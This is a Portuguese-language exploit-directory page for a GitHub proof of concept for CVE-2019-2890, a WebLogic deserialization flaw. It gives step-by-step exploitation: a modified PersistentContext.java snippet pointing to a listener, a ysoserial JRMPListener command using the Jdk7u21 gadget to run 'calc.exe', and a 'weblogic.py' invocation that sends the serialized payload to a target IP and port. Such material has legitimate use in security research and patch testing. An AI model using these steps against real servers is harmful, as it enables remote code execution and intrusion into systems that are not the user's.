Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-2890 — 0-sec.org | Kitploit
Ferramentas/GitHubGitHub/ianxtianxt/cve-2019-2890
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso Remoto
GitHubianxtianxt/cve-2019-2890

CVE-2019-2890

0-sec.org

Ver Repositório
42há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

声明

Apenas para fins de estudo e compartilhamento técnico; outras utilizações são de inteira responsabilidade do usuário.

说明

Os arquivos jar relevantes já foram importados para o projeto, e o método de exploração utiliza o JRMP do yso. Ao estudar ou depurar, você pode modificar o método de exploração.

Primeiro, coloque o arquivo SerializedSystemIni.dat do weblogic na pasta security.

Em seguida, renomeie o yso para ysoserial.jar e importe-o para o diretório lib.

1

Depois, ajuste o endereço IP e a porta do getObject em weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Por fim, faça a escuta remotamente via JRMP e utilize a execução de comandos do 7u21.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Método de uso: execute o Poc.java para gerar o arquivo de serialização poc.ser e, em seguida, use:

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

Baixar ferramenta